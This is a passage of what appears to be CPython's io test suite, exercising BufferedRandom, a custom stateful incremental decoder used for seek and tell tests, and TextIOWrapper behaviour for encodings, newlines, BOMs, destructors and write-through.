mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
